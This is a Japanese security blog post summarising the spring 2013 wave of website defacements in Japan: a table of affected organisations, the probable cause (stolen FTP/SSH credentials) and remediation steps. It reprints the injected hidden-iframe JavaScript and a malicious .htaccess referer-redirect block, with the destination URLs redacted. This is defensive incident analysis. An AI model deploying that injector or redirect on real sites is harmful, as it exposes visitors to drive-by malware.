Hatena::ブログ(Diary)

piyolog RSSフィード

2013-06-04

5月から多発しているHP改ざんインシデントをまとめてみた。

| 22:40 | 5月から多発しているHP改ざんインシデントをまとめてみた。を含むブックマーク

概要

5月に入ってから複数の組織でホームページの改ざんが発生していると報じられています。この件に直接関連しているかは不明ですが、IPA警察庁トレンドマイクロホームページの改ざんに関して注意喚起や情報を掲載しています。IPAは2008年に猛威を振るったGumblarによるものや2012年9月18日前後に多発したHP改ざんの規模に匹敵すると発表しています。ここでは5月以降発生している改ざんインシデントについてついてまとめます。

改ざんの概要イメージ

現時点で判明している情報、及びそこから推測される内容を踏まえて一連の流れを図にしました。(改ざんが行われるまでの流れは推測部分が多く含まれます。)

f:id:Kango:20130606214809p:image:w800

 

改ざんされたサイト

5月以降、ホームページが改ざんされたことを公表しているサイトを以下に掲載します。全ての組織がこのように公表することはないと考えられるため、これらサイトも多発している改ざんの一部だと思われます。また以下のリストは「HPが改ざん」されたことを共通点としているだけであり、これら一連の改ざんが関連したものであるかは不明です。

No改ざんされたサイトURL改ざん期間*1改ざん原因改ざん内容掲載文
1鹿児島県教職員互助組合kyogo.or.jp05/01 2:45〜05/02 13:32掲載無ウィルスに感染する可能性*2
2アウンコンサルティング株式会社www.auncon.co.jp05/01〜05/07サーバーへの不正アクセスウィルスに感染する可能性
HEUR:Trojan.Script.Generic
*3
3赤髭亭akahigetei.extrem.ne.jp掲載無
(05/18に判明、その後6/2に復旧するも再度改ざん)
掲載無ウィルスに感染する可能性
JS:IFrame-BLN[Trj]
JS:IFrame-AHU[Trj]
*4 *5
4世界人権問題研究センターwww.mmjp.or.jp/jinken05/21〜05/28午後デンマークからの不正アクセスウィルスに感染する可能性*6 *7
5有限会社APCブレーンAPCブレーン及び所属アーティスト含む関連ページ
www.apc-brain.co.jp
レディバード
www.apc-brain.co.jp/ladybird
05/22 19:37〜05:26 1:27掲載無ウィルスに感染する可能性
Trojan:JS/Rediredtor.MB
*8
6日本産業廃棄物処理振興センターwww.jwnet.or.jp/whatsnew/index.php
www.jwnet.or.jp/oshirase/index.php
www.jwnet.or.jp/workshop/index.php
掲載無(修正は05/17)掲載無ウィルスに感染する可能性
TROJ_FAKEAV亜種
*9
7リコージャパンプリントアウトファクトリー
www.printout.jp
05/25 7時頃〜05/31 22時半頃掲載無ウィルスに感染する可能性
トロイの木馬マルウェア
*10
8株式会社ディーバwww.diva.co.jp05/25 15:50〜05/29 15:10第三者の不正アクセスウィルスに感染する可能性*11
9科学技術振興機構crds.jst.go.jp/5th/
crds.jst.go.jp/about_sympo/
crds.jst.go.jp/access/
crds.jst.go.jp/GIES/
crds.jst.go.jp/daily/
05/25〜05/27 10時頃
2013/06/01〜2013/06/03 11時55分
掲載無悪性サイトへ誘導される可能性*12
10三重交通グループホールディングス株式会社観光販売システムズホームページ
kanko-pro.co.jp
トライパルツアー
sanq-tripal.com
熊野古道シャトルバス
Kumanokodo.co.jp
みえ観光ウェブ
mie-kanko.jp
05/26 17:00〜06/01 17:00掲載無ウィルスに感染する可能性*13 *14
11横浜シティ・エア・ターミナル株式会社YCAT
www.ycat.co.jp
05/26 23:00〜05/27 17:00掲載無ウィルスに感染する可能性*15
12神奈川県保険医協会「いい医療.com」の一部05/27 0:00〜14:00PC経由による不正アクセス悪性サイトへ誘導される可能性*16 *17
13美浜町www.town.mihama.aichi.jp05/28 13:00〜16:00掲載無ウィルスに感染する可能性*18
14田原総一郎www.taharasoichiro.comの一部05/28〜05/29 13時掲載無悪性サイトへ誘導*19
15株式会社アーク京のすっぴんさん
www.suppinsan.com
05/28 15:17〜05/29 14:00掲載無ウィルスに感染する可能性*20
16ワタナベ ランドLAND et vous
landetvous.com
掲載無(掲載日付は05/29)掲載無ウィルスに感染する可能性*21
17ミツミ電機株式会社www.mitsumi.co.jp5/29 7:20〜13:373回にわたり不正アクセスウィルスに感染する可能性*22
18株式会社アジュバンコスメジャパンRe:PRO
www.repro-top.com
05/29 17:00〜06/01 9:25掲載無ウィルスに感染する可能性
JS_Trojan.Crypt.MT
*23
19情報ネットワーク法学会in-law.jp配下のWebページ全て05/29 19時〜05/30 12時FTPあるいはSSH悪性サイトへ誘導*24
20沖縄県県立玉城青少年の家
www.okinawa-nanjo-youthhome.jp
05/29 20:00〜06/03 11:00掲載無文字化け
ウィルスに感染する可能性
*25
21山梨県立塩山高等学校塩山高校商業研究部
www.enzanh.kai.ed.jp/ENZAN business research club WEB/配下のページ
塩山高校女子ソフトボール部
www.enzanh.kai.ed.jp/ENZAN softball club WEB/配下のページ
05/29〜05/30掲載無ウィルスに感染する可能性*26
22フジ印刷株式会社WarpStyle
warpstyle.jp
05/29〜05/30 12:00Webサーバーへの不正アクセスウィルスに感染する可能性*27
23横浜市横浜観光情報
www.welcome.city.yokohama.jp
05/30 4:00〜16:30掲載無書き換えられたのみ*28
24横浜市www.kuraki-noh.jp05/30 10:00〜06/04 12:10掲載無ウィルスに感染する可能性
JS_BLACOLE.SMTT
*29
25日比谷アミューズメントプランニングらんの里 堂ヶ島
www.dogashima.com
05/30 14:16〜18:22掲載無ウィルスに感染する可能性
悪性サイトへ誘導される可能性
*30
26愛知県バドミントン協会www.badminton-aichi.comの一部05/30 17:13〜06/01 17:30掲載無ウィルスに感染する可能性*31
27東京大学医学部付属病院www.h.u-tokyo.ac.jp05/30 20:00〜05/31 2:30管理業者PC感染による改ざんウィルスに感染する可能性*32
28ときめきドットコムシンニチプレミアムストア
njpw-p.jp
05/30 19時〜06/03 14時掲載無ウィルスに感染する可能性
JS_BLACOLE.SMTT
*33
29姫路市まちづくり振興機構himeji-machishin.jp05/31 4:30〜17:00掲載無ウィルスに感染する可能性*34
30株式会社幼児教育実践研究所こぐま会
www.kogumakai.co.jp
05/31 18:30〜06/04 10:00掲載無ウィルスに感染する可能性
JS_BLACOLE.SMTT
*35
31株式会社テレワークマネジメントwww.telework-management.co.jpの一部05/31未明〜11時頃掲載無ウィルスに感染する可能性
JS_BLACOLE.SMTT
*36
32☆脱!カラオケコンプレックスwww.arcadia.gr.jp5月末〜06/04 AM掲載無ウィルスに感染する可能性
HEUR:Trojan.Script.Generic
*37
33エフエム群馬fmgunma.com配下の248ファイル06/01 5時〜06/03 13時外部から不正アクセスウィルスに感染する可能性*38 *39
34仙台市農作物有害鳥獣対策協議会www.inocc.jpの一部06/01〜06/03アクセス掲載無ウィルスに感染する可能性*40
35株式会社ウェブメッセージplaza.rakuten.co.jp/toretama/06/01〜06/02掲載無掲載無*41
36北海道文教大学www.do-bunkyodai.ac.jp掲載無(06/02に判明)掲載無ウィルスに感染する可能性*42
37神戸市立桃山台児童館www.eonet.ne.jp/~momoyamadai/06/02〜06/03掲載無ウィルスに感染する可能性*43
38日本馬術連盟www.equitation-japan.comの一部06/04 15:47〜17:25掲載無掲載無*44
39有限会社ゆたぷろwww.yutapro.comの一部06/04 17:00〜06/05 11:45掲載無ウィルスに感染する可能性
JS_BLACOLE.SMTT
*45
40能登空港利用促進協議会www.notohantou.net06/05 1:00〜10:00第三者の不正アクセストップページが表示されない
ウィルスに感染する可能性
*46
41札幌市札幌市ワークライフ・バランス推進事業
www.sapporo-wlb.jp
改ざん時期不明〜06/05 0:10掲載無ウィルスに感染する可能性
JS_BLACOLE.SMTT
*47 *48
42日本創造教育研究所ありがとう経営のすすめ
arigatou-keiei.jp
業績アップ研修.com
gyoseki-up.com
心に残るありがとう体験談募集
arigatou-taiken.jp
朝礼.com
cho-rei.com
ありがとう卓越経営大賞
arigatou-takuetsu.jp
人事セミナー.com
yarigai-jinji.com
ありがとうブログ
arigatou-blog.com
建設みらい研究所
kensetsu-mirai.com
05/29 20:42〜05/30 11:13掲載無ウィルスに感染する可能性
Gumblarの亜種
*49
43有限会社 ビブリオポリwww.bibliopoly.co.jp掲載無掲載無掲載無*50
44株式会社アークwww.organic-skincare.jpの一部05/28 15:17〜05/29 12:40第三者の不正アクセスウィルスに感染する可能性*51
45アール・ビー・コントロールズ株式会社www.rbcontrols.co.jpのHTMLファイル全て06/02 10:20〜06/03 10:00第三者の不正アクセスウィルスに感染する可能性
JS/Kryptik.AKY
*52
46エスペック株式会社Test-Navi
www.test-navi.com
06/04 17:00〜06/05 12:00第三者の不正アクセスウィルスに感染する可能性*53
47札幌市ようこそさっぽろ
www.welcome.city.sapporo.jp
掲載無(06/05 9:00発覚)〜06/06 20:00掲載無掲載無*54 *55
48早稲田スポーツ新聞会www.wasedasports.com掲載無(06/05 22:32時点で改ざん確認)掲載無掲載無*56
49寺本法律会計事務所teramoto-law.jp05/31〜06/06第三者の不正アクセスウィルスに感染する可能性*57
50函館信用金庫www.hakodate-shinkin.jpの一部06/03 1:00〜06/04 9:30第三者の不正アクセスウィルスに感染する可能性*58
51株式会社トヨシマwww.kk-toyoshima.co.jpの一部05/29〜06/03第三者の不正アクセスウィルスに感染する可能性*59
52浜松グリーンウェーブ株式会社www.hgw.co.jpの一部06/03 4:00〜06/06 22:00第三者の不正アクセスウィルスに感染する可能性*60 *61
53株式会社アークふじ光成堂薬局
www.sasaherusu.comの一部
05/28 15:17〜05/29 12:40第三者の不正アクセスウィルスに感染する可能性*62
54株式会社アークふじ光成堂薬局
www.organic-skincare.jpの一部
05/28 15:17〜05/29 12:40第三者の不正アクセスウィルスに感染する可能性*63
55上毛新聞TRサービスTRサービスホームページ
www.j-tr.jp
デリジェイホームページ
deli-j.j-tr.jp
掲載無(06/04判明)掲載無ウィルスに感染する可能性*64
56北恵株式会社www.kitakei.jp06/01 23:00〜06/04 12:00外部委託サーバー不正アクセスウィルスに感染する可能性
JS/Kryptik.ANY
*65
57有限会社アップフィールド日報Webシステム
np-sys.info
05/25 16:50〜05/30 00:00掲載無ウィルスに感染する可能性*66
58株式会社一幸陶苑PRIMAG
www.pri-mug.com
掲載無掲載無ウィルスに感染する可能性*67
59株式会社エー・ティー・エックス複数の特設ページ
www.at-x.com/html/
06/04〜06/06 20:00第三者の不正アクセスウィルスに感染する可能性*68
60株式会社ミノウラwww.mnr.co.jp05/03〜05/28第三者の不正アクセスウィルスに感染する可能性*69
61日本デオドール株式会社www.deodor.co.jp05/28〜06/02国外からの不正アクセス掲載無*70
62大富士フットボールクラブohfuji-fc.com05/04〜05/06掲載無ウィルスに感染する可能性*71
63葉鍼灸院you-sinkyu-in.com05/28 15:31〜19:48米国からの不正アクセスウィルスに感染する可能性*72
64板橋区立成増小学校支援地域本部narimasu.gr.jp05/18 13:00〜22:00第三者の不正アクセスウィルスに感染する可能性*73
65株式会社CRAZY TVwww.crazytv.com05/29〜06/03第三者の不正アクセスウィルスに感染する可能性*74
66株式会社 かなえるリンクwww.kanaerulink.co.jp06/02 11:50〜06/04 18:00第三者の不正アクセスウィルスに感染する可能性*75
66緑秀会田無病院www.tanashi-hospital.or.jp/06/03 1:00〜06/04 12:00第三者の不正アクセスウィルスに感染する可能性*76
67株式会社ドゥ・ハウスモラタメ.net
www.moratame.net
06/05 18:44〜06/07 6:30第三者の不正アクセスウィルスに感染する可能性*77
68札幌静修高等学校www.sapporoseishu.ed.jp06/02 14:00〜06/04 9:00第三者の不正アクセスウィルスに感染する可能性*78
69日本文化出版株式会社NBPオンラインショッピング
shop.nbp.ne.jp
05/30 8:00〜06/06 20:00第三者の不正アクセスウィルスに感染する可能性*79
70海洋研究開発機構高知コア研究所
www.kochi-core.jp
05/25〜05/29第三者の不正アクセスウィルスに感染する可能性*80
71ゑびすやwww.ebisuyagolf.com06/02〜06/05 15:00第三者の不正アクセスウィルスに感染する可能性*81
72すみだ産業会館www.sumidasangyokaikan.jp06/05第三者の不正アクセスウィルスに感染する可能性*82
73地盤工学会電子図書室サービス
www.jgs-library.net
掲載無(06/03判明)〜06/04第三者の不正アクセスウィルスに感染する可能性*83
74愛知・豊川用水振興協会aitoyo.or.jp05/29 15:00〜06/06 18:00第三者の不正アクセスウィルスに感染する可能性*84
75栄信電気工業株式会社www.eisin.co.jpの一部05/31〜06/03第三者の不正アクセスウィルスに感染する可能性*85
76登録紹介宣伝あくせすくんpark1.wakwak.com/~com/掲載無(06/01掲載)不明不明*86
77日本赤十字社www.jrc.or.jp05/30 20:00〜21:54第三者による改ざんウィルスに感染する可能性*87
78株式会社HKSバスデポ
bus-depot.in
06/04 23:00〜06/06 12:00第三者による不正アクセスウィルスに感染する可能性*88
79石川県教職員互助会www.ishikyogo.or.jpの一部05/31 0:00〜16:00第三者による不正アクセスウィルスに感染する可能性*89
80株式会社アクアwww.aqua-ltd.com05/31 7:39〜06/05 2:46第三者による不正アクセスウィルスに感染する可能性*90
81国立民族学博物館関雄二教授個人HP
www.r.minpaku.ac.jp/sekito/
05/25〜06/06第三者による不正アクセスウィルスに感染する可能性*91
82長谷川敬税理士事務所office-hasegawa.com05/29〜06/03 19:00第三者による不正アクセスウィルスに感染する可能性
JS_BLACOLE.SMTT
*92
83TokiwagiFC Fantokiwagifcfan.com掲載無(06/04に判明)掲載無ウィルスに感染する可能性*93
84東京こけし友の会www.tokyo-kokeshi.jp05/30〜06/04掲載無掲載無*94
85ΜΟΟΥΣΕΊΟΝwww.moouseion.com
www.hisaoh.com
www.letharia.com
05/28〜05/30海外からの不正アクセス掲載無*95
86松菱金属工業株式会社www.matsubishi-kinzoku.co.jpの一部06/01 16:40〜06/04 16:40悪意を持った第三者からの攻撃ウィルスに感染する可能性
JS_BLACOLE.SMTT
*96
87日本グラフィックサービス工業会www.jagra.or.jp06/03 2:00〜10:00掲載無ウィルスに感染する可能性
トロイの木馬
(不正JavaScriptの埋め込み)
*97
88盛岡三菱自動車販売株式会社morioka-mitsubishi.com06/04 18:30〜06/06 13:00第三者の不正アクセスウィルスに感染する可能性
JS_BLACOLE.SMTT
*98
89北海道文化財団haf.jpの一部05/30〜06/03第三者の不正アクセスウィルスに感染する可能性*99
90ふどうさんの現代屋www.gendaiya.com掲載無(06/13発表)海外からのFTP接続掲載無*100
91株式会社さうすウェーブsouthwave.co.jp06/01 0:00〜06/04 18:00第三者の不正アクセスウィルスに感染する可能性*101
92湘南鎌倉総合病院shonankamakura.or.jp06/11 6:40〜13:05第三者の不正アクセスウィルスに感染する可能性*102
  • その他下記サイトも今回の被害を受けていた可能性があります。(一部サイトはまだブラウザによる警告が表示されます。不用意にアクセスはしないでください。)*103
01: 08.hanatoweb.jp
02: agc.bunka758.or.jp
03: arcwet.jp
04: asunaro-higashiosaka.jp
05: baseball.h01.jp
06: blog.willcare.jp
07: bellezza8.sakura.ne.jp
08: cdvnet.jp
09: finaledge.jp
10: fuchu.shogaigakushu.jp
11: jci763.or.jp
12: jqkk.jp
13: karilab.jp
14: miharagumi.jp
15: minikiti.wiki2.jp
16: mirai.sa-ba.jp
17: netrunner.sakura.ne.jp
18: nihongo-online.jp
19: soho.h01.jp
20: soulnote.jp
21: www.technis.jp
22: tokyo.cafemix.jp
23: toshei.jp
24: www.cdvnet.jp
25: www.chabai.jp
26: www.cleaningcoco.jp
27: www.coolspot-osaka.jp
28: www.dorf.co.jp
29: www.eiraitei.jp
30: www.fuzoku-watch.com
31: www.ginzado.ne.jp
32: www.hakkosya.co.jp
33: www.heaven-luxu.jp
34: www.hokudai.ac.jp
35: www.hosu-gogo.jp
36: www.ibiz.jp
37: www.jagra.or.jp
38: www.japanprimo.gr.jp
39: www.jicc.co.jp
40: www.k-amity.jp
41: www.ksbnet.co.jp
42: www.lcy.jp
43: www.maguchi.co.jp
44: www.naniwa-kenma.co.jp
45: www.nanbunoyu.jp
46: www.niccori-maccori.jp
47: www.nifa.co.jp
48: www.nodapg.or.jp
49: www.ostec.or.jp
50: www.plan-inc.jp
51: www.popcycle.co.jp
52: www.ruri-diet.jp
53: www.select.jp
54: www.shogakkan.jp
55: www.tohot.jp
56: www.videofes.jp
57: ベンツパーツ.jp
58: cattleya.sitemix.jp

 

改ざんされる内容

複数の方の報告によればWebサーバー上に配置されている次の拡張子のファイルの全部、または一部に対して、第三者による改ざんが行われています。改ざん方法にはいくつかの種類があり、確認されているものの多くは共通して「0c0896」という文字列が埋め込まれています。改ざんサイトを閲覧した際、悪性サイトへリダイレクトをさせ、そこでマルウェア(以下のese_adminさんのBlogによればFakeAV系)に感染させることを目的としているように見受けられるものの、wakatonoさんが分析されているように書き換えはできたものの埋め込みをしたJavaScriptが動作しない(いわゆる毒入れに失敗したかの)ようなケースもあるようです。*104

  • HTMLファイル(.html)
  • JSPファイル(.jsp)
  • PHPファイル(.php)
  • JavaScriptファイル(.js)
  • JSONファイル(.json)
  • テンプレートファイル(.tpl)
  • 分散設定ファイル(.htaccess)
今回の改ざんについて調査・考察されている方の記事
静的コンテンツへの改ざん

静的コンテンツへの改ざんは難読化されたJavaScript(数字の羅列の様な文字列)が埋め込まれます。トレンドマイクロによりJS_BLACOLE.SMTTとして検知される実体は埋め込まれたJavaScriptです。実際に実行されるのは次のようなコードです。変数名等、一部は改ざん先によって異なる場合があるようです。悪性サイトへリダイレクトする1pxのIFRAMEが埋め込まれることになります。

function zzzfff()
{
	var egefi = document.createElement('iframe');
	egefi.src = 'http://(リダイレクト先悪性サイトURL)';
	egefi.style.position = 'absolute';
	egefi.style.border = '0';
	egefi.style.height = '1px';
	egefi.style.width = '1px';
	egefi.style.left = '1px';
	egefi.style.top = '1px';
	if (!document.getElementById('egefi'))
	{
		document.write('<div id=\'egefi\'></div>');
		document.getElementById('egefi').appendChild(egefi);
	}
}

function SetCookie(cookieName,cookieValue,nDays,path)
{
	var today = new Date();
	var expire = new Date();
	if (nDays==null || nDays==0) nDays=1;
	expire.setTime(today.getTime() + 3600000*24*nDays);
	document.cookie = cookieName+"="+escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

function GetCookie( name )
{
	var start = document.cookie.indexOf( name + "=" );
	var len = start + name.length + 1;
	if ( ( !start ) &&
	( name != document.cookie.substring( 0, name.length ) ) )
	{
		return null;
	}
	if ( start == -1 ) return null;
	var end = document.cookie.indexOf( ";", len );
	if ( end == -1 ) end = document.cookie.length;
	return unescape( document.cookie.substring( len, end ) );
}

if (navigator.cookieEnabled)
{
	if(GetCookie('visited_uq')==55){}
	else
	{
		SetCookie('visited_uq', '55', '1', '/');
		zzzfff();
	}
}
分散設定ファイルへの改ざん

MASAKIさんより.htaccessの改ざんに関する情報を頂きました。検索やポータルサイト等からこの.htaccessが改ざんされたサイトを訪れた場合に悪性サイトへリダイレクトさせるものと思われます。

#0c0896#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://転送先URL [R=301,L]
</IfModule>

#/0c0896#

 

改ざんされた原因

現在進行形で起きているためか、改ざん原因について詳細を公表している組織はあまり多くありませんが、改ざん原因を発表している組織がいくつかあり、以下に抜粋します。

  • 情報ネットワーク法学会

改ざんは、管理者アカウントを何らかの方法で入手してFTPあるいはSSHにより外部から実行されたものと判断しており

http://in-law.jp/
  • 神奈川県保険医協会

本サイトの管理・運営委託会社のパソコンを経由して、サイト用サーバー不正アクセスがあり、改ざんされるという被害を受けました

http://www.hoken-i.co.jp/outline/cat272/post_102.html
  • 赤髭亭

先ほど赤髭亭をUPしているサーバーフォルダ内より観察のためHTMLファイルをダウンロードしソースを確認しようとした所、ウィルス駆除ソフトがDL対象のHTMLを

JS:IFrame-AHU[Trj]

であると判断し隔離駆除を行うという事態が発生いたしました。

よって、上記ウィルスが再UpしたHTMLに再度感染し何らかの改ざんを行った可能性を考え

http://sengoku.gflag.biz/?eid=1547350
  • 東京大学医学部付属病院

当院がホームページのコンテンツ管理(CMS)を委託している企業側のパソコンがコンピュータウイルス感染した事が原因でした。

http://www.h.u-tokyo.ac.jp/oshirase/archives/20130604.html

また、IPAやJPCERT/CCの注意喚起によるとFTPSSHアカウント情報を窃取するウィルスの存在に触れられています。

“パソコンのJavaのバージョンが古いままだったためにFTPアカウント情報を漏えいさせるウイルス感染した”というウイルス感染のケース※もありました。

http://www.ipa.go.jp/security/txt/2013/06outline.html
  • JPCERT/CC

また、攻撃に使用されている一部のマルウエアには、FTP/SSH クライアントや Web ブラウザなどに保存されている過去に入力したアカウント情報などを窃取する機能を有しているものがあり、Web コンテンツ更新に使用されるアカウント情報がマルウエアにより窃取されている可能性があります。

http://www.jpcert.or.jp/at/2013/at130027.html

さらにこの件に関連していると思われる質問がYahoo知恵袋に投稿されています。この被害を受けた方はFTPサーバーを使っていたようです。

これらから、今回多発している改ざんは、Gumblarのようなマルウェア、あるいは情報を窃取するマルウェアを通じて管理用ID、パスワードが盗まれた*105ことが原因で改ざんされたのではないかと考えられます。*106

 

改ざんを受けた場合の対策

改ざん被害を受けたサイトはID、パスワードの変更だけにとどまるのではなく、次の点に対応漏れがないか確認してください。

  • Webサイト管理用のアプリケーションCMSや管理ソフト)が最新の状態かどうか
  • Webサイトのメンテナンスは管理端末のみに接続が制限されているか
  • 管理端末でウィルス対策ソフトによるスキャンが行われているか
  • サーバー、管理端末のOS、ウィルス対策ソフト、ドキュメントソフト等がすべて最新の状態か

また今回の事例ではトップページではなく、その配下のWebページが改ざんされているケースも見受けられることから、改ざんされた事実に気づいていない可能性もあり、FTPログや管理するコンテンツに差分が発生していないかも確認したほうが良いでしょう。

 

関連

更新履歴

*1:表記は全て2013年発生

*2鹿児島県教職員互助組合ホームページの改ざんについて,鹿児島県教職互助組合,2013/06/06アクセス:魚拓

*3コンピュータウイルス感染の報告とお詫び,アウンコンサルティング,2013/06/04アクセス:魚拓

*4【重要】赤髭亭HP復旧延期についてのお知らせ,赤髭亭,2013/06/04アクセス:魚拓

*5【重要】赤髭亭が表示されない件およびサーバー移転の御案内,赤髭亭,2013/06/04アクセス:魚拓

*6世界人権問題研究センターからのお知らせ,世界人権問題研究センター,2013/06/04アクセス:魚拓

*7HPがウイルス感染 世界人権問題研究センター 京都,MSN産経,2013/06/04アクセス:魚拓

*8当社ホームページ及び関連ページの改ざんに関するお詫びとご報告,APCブレーン,2013/06/04アクセス

*9当センターホームページの改ざんに関するお詫び,日本産業廃棄物処理振興センター,2013/06/04アクセス:魚拓

*10「プリントアウトファクトリー」サイト改ざんに関するお知らせ,リコージャパン,2013/06/04アクセス:魚拓

*11不正アクセスによるサイト改ざんについて,ディーバ,2013/06/06アクセス:魚拓

*12ホームページ改ざんに関するお知らせとお詫び,科学技術振興機構,2013/06/04アクセス:魚拓

*13:(PDF当社のグループ会社におけるWEBサイト改ざんについてのお詫び,三重交通グループホールディングス,2013/06/06アクセス

*14:(PDF当社のグループ会社におけるWEBサイト改ざんについての追加情報,三重交通グループホールディングス,2013/06/06アクセス

*15ホームページ改ざんに関するお知らせとお詫び,横浜シティ・エア・ターミナル,2013/06/06アクセス:魚拓

*16神奈川県保険医協会ホームページ「いい医療.com」の改ざん発生について,神奈川県保険医協会,2013/06/04アクセス:魚拓

*17(重要)本ウェブサイトの復旧のお知らせとお願い,神奈川県保険医協会,2013/06/04/アクセス:魚拓

*18美浜町ホームページを閲覧された皆様へ、ホームページ改ざんに関するお詫び,美浜町,2013/06/04アクセス:魚拓

*19ホームページ改ざんに関するお知らせとお詫び,田原総一郎,2013/06/04アクセス:魚拓

*20ホームページ改ざんに関するお知らせとお詫び,アーク,2013/06/04アクセス:魚拓

*21【Night on the Planet および LAND et vous より重要なお知らせ】,ワタナベランド,2013/06/04アクセス:魚拓

*22<重要なお知らせ>不正アクセスによる障害のお知らせとウィルスチェックのお願い,ミツミ電機,2013/06/04アクセス:魚拓

*23:(PDF当社ホームページの改ざんに関するお詫びとご報告,アジュバンコスメジャパン,2013/06/06アクセス

*24ウェブサイト改ざんのご報告とお詫び,情報ネットワーク法学会,2013/06/04アクセス:魚拓

*25【重要】県立玉城青少年の家ホームページ改ざんについて,沖縄県,2013/06/06アクセス:魚拓

*26本校ウェブサイトへの不正アクセスについて,山崎県立塩山高等学校,2013/06/04アクセス:魚拓

*27当Webサイト改ざんに関する報告とお詫び,フジ印刷,2013/06/06アクセス:魚拓

*28ウェブサイト改ざんのご報告とお詫び,横浜市,2013/06/06アクセス:魚拓

*29久良岐 お詫び,シグマコミュニケーションズ,2013/06/05アクセス:魚拓

*30らんの里堂ヶ島ホームページに関するお詫びとお知らせ,日比谷アミューズメントプランニング,2013/06/04アクセス:魚拓

*31公式サイト改ざんに関するお詫びとご報告,愛知県バドミントン協会,2013/06/05アクセス:魚拓

*32当院ホームページの不正な改変事案に関する注意喚起とお詫びとお願い,東京大学医学部付属病院,2013/06/05アクセス:魚拓

*33シンニチプレミアムストアご利用のお客様へ改ざんに関するお詫びとお知らせ,ときめきドットコム,2013/06/04アクセス:魚拓

*34当機構ホームページの改ざんについて,姫路市まちづくり振興機構,2013/06/04アクセス:魚拓

*35「当サイトの改ざんに関するお詫び」,幼児教育実践研究所,2013/06/06アクセス:魚拓

*36弊社ホームページの改ざんに関するお詫び,テレワークマネジメント,2013/06/05アクセス:魚拓

*37改ざん被害が発生しました…申し訳ございません。[カラオケスクールお知らせ],☆脱!カラオケコンプレックス,2013/06/04アクセス:魚拓

*38ホームページ不正改ざんについてのお詫び,エフエム群馬,2013/06/04アクセス:魚拓

*39ホームページ再開にあたってのご報告,エフエム群馬,2013/06/07アクセス:魚拓

*40仙台市農作物有害鳥獣対策協議会ホームページの一部が改ざんされました,仙台市,2013/06/04アクセス:魚拓

*41ご連絡。,ウェブメッセージ,2013/06/06アクセス:魚拓

*42本学「ホームページ」に関するお詫びとお知らせ,北海道文教大学,2013/06/04アクセス:魚拓

*43神戸市立桃山台児童館のホームページを閲覧された方へ,神戸市,2013/06/05アクセス:魚拓

*44日本馬術連盟ホームページの改ざん被害と復旧のご報告,日本馬術連盟,2013/06/05アクセス:魚拓

*45弊社ホームページの改ざんに関するお詫び,ゆたぷろ,2013/06/05アクセス:魚拓

*46ホームページ改ざんに関するお知らせとお詫び,能登空港利用促進協議会,2013/06/06アクセス:魚拓

*47現在、「札幌市ワーク・ライフ・バランス推進事業」HPが閲覧できなくなっています。,札幌市,2013/06/06アクセス:魚拓

*48札幌市HPがウイルス感染 閲覧者に確認呼び掛け,北海道新聞,2013/06/06アクセス:魚拓

*49:(PDF当社の関連ホームページをご覧になった皆さまへのお願い,日本想像教育研究所,2013/06/06アクセス

*50【ホームページ改ざんに関するお詫び − 復旧いたしました】,ビブリオポリ,2013/06/06アクセス:魚拓

*51【当社サイト改竄に関するお詫び】,アーク,2013/06/06アクセス:魚拓

*52弊社サイトの改ざんに関するお詫び,アール・ビー・コントロールズ,2013/06/06アクセス:魚拓

*53ホームページ改ざんに関するお知らせとお詫び,エスペック,2013/06/06アクセス:魚拓

*54札幌市観光情報サイト「ようこそさっぽろ」停止のお知らせ,札幌市,2013/06/07アクセス:魚拓

*55札幌市の観光HP、不正アクセス受け閉鎖,読売新聞,2013/06/07アクセス:魚拓

*56ホームページ一時閉鎖のお知らせ,早稲田スポーツ新聞会,2013/06/07アクセス:魚拓

*57重要なお知らせ(サイト改ざんの被害について),寺本法律会計事務所,2013/06/07アクセス:魚拓

*58:(PDFホームページ改 ホームページ改ざんに関するお知らせとお詫び,函館信用金庫,2013/06/07アクセス

*59:(PDF当社ホームページ改ざんに関するお詫びとご報告,トヨシマ,2013/06/07アクセス

*60ホームページ改ざんに関するお知らせ・一時的な閉鎖とお詫び,浜松グリーンウェーブ,2013/06/07アクセス:魚拓

*61浜松グリーンウェーブ株式会社ウェブサイトへの不正アクセスと改ざん被害の発生について,浜松市,2013/06/07アクセス:魚拓

*62【当社サイト改竄に関するお詫び】,アーク,2013/06/07アクセス:魚拓

*63【当社サイト改竄に関するお詫び】,アーク,2013/06/07アクセス:魚拓

*64ホームページアクセス不能についてのお詫び,上毛新聞TRサービス,2013/06/07:魚拓

*65:(PDFコンピュータウイルス感染のご報告とお詫び,北恵,2013/06/07アクセス

*66『日報webシステム』サイト改ざんに関する報告とお詫び,アップフィールド,2013/06/07アクセス:魚拓

*67弊社サイト改ざんに関するお詫びとご説明,一幸陶苑,2013/06/07アクセス:魚拓

*68AT-X公式ホームページ改ざんに関するお知らせとお詫び,エー・ティー・エックス,2013/06/07アクセス:魚拓

